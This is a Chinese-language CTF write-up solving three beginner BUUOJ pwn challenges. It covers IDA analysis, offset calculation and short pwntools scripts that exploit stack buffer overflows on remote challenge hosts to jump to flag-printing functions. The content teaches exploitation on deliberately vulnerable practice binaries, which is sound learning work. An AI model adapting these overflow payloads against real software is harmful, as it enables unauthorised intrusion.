ciscn_2019_n_1
题目
题目链接:https://buuoj.cn/challenges#ciscn_2019_n_1
解答
1、打开IDA进行分析
发现函数gets和系统命令cat
此函数的大致意思是输入v1的值,然后判断v2,故存在栈溢出使得v2的内存中的值为11.28125
2、判断偏移地址
v2的内存地址距离v1首地址的偏移量是30h-04h=2ch
3、gdb调试一波
没有堆栈溢出保护
4、编写脚本
11.28125的十六进制可以在IDA中查看
将鼠标光标放在相应指令上
点击跳转查看
from pwn import *
p = remote('node4.buuoj.cn',25698)
payload = 'a'*0x2c+p32(0x41348000)
p.sendline(payload)
p.interactive()
参考连接:https://www.cnblogs.com/vict0r/p/13786557.html
pwn1_sctf_2016
题目
题目链接:https://buuoj.cn/challenges#pwn1_sctf_2016
解答
1、先checksec
32位,没有堆栈溢出保护
2、IDA分析
找到main函数
里面没有什么内容,只调用vuln函数,分析这个函数
同时shift+F12查看字符串
发现了系统调用,查看该字符串的应用处
在get_flag函数中找到,其中地址在08048f13
回到vuln函数,F5分析
发现了fgets函数,考虑一波栈溢出,但是此输入受到了限制,输入字符不能超过32,但是s的地址空间大小为3ch
由于s的地址空间大小有60,而只能输入少于32个字符,不能造成栈溢出,但是返现代码中还有其他功能函数replace,意思是如果输入中有I,则会替换成you,正好60个大小空间可以输入20个I来替换成20个you,这样就能填充s的空间
3、编写脚本
from pwn import *
p = remote('node4.buuoj.cn',25866)
payload = 'I'*20+'aaaa'+p32(0x08048F13)
p.sendline(payload)
p.interactive()
得到flag
提示:如果看不懂replace函数,可以运行试一下文件的实际效果
可以发现将I转化成了you
参考链接:https://www.cnblogs.com/Jlay/p/pwn_wp1.html
jarvisoj_level0
题目
链接:https://buuoj.cn/challenges#jarvisoj_level0
解答
1、checksec
64位,没有堆栈溢出保护
这里也可以用PE等工具检测,ubantu16环境下,运行一下看效果
2、IDA分析
查看main函数
调用了vulnerable_function()函数
发现了read函数,表示从输入流中读取输入存到buf,读取最大字符为200h,而buf的空间大小为80h,常规操作,返回地址距离s首地址的偏移量为80h+8
发现了系统调用命令,地址为0x40059A
3、编写脚本
from pwn import *
p = remote('node4.buuoj.cn',29562)
payload = 'a'*0x80+'a'*8+p64(0x40059A)
p.sendline(payload)
p.interactive()
拿到flag
知识点
C语言read()函数:用于读取打开文件的内容
函数名:read
头文件:<io.h>
函数原型: int read(int handle,void *buf,int len);
功能:用于读取打开文件的内容
参数:int handle 为要读取的文件
void *buf 为要将读取的内容保存的缓冲区
int len 读取文件的长度
返回值:返回实际读取的字节数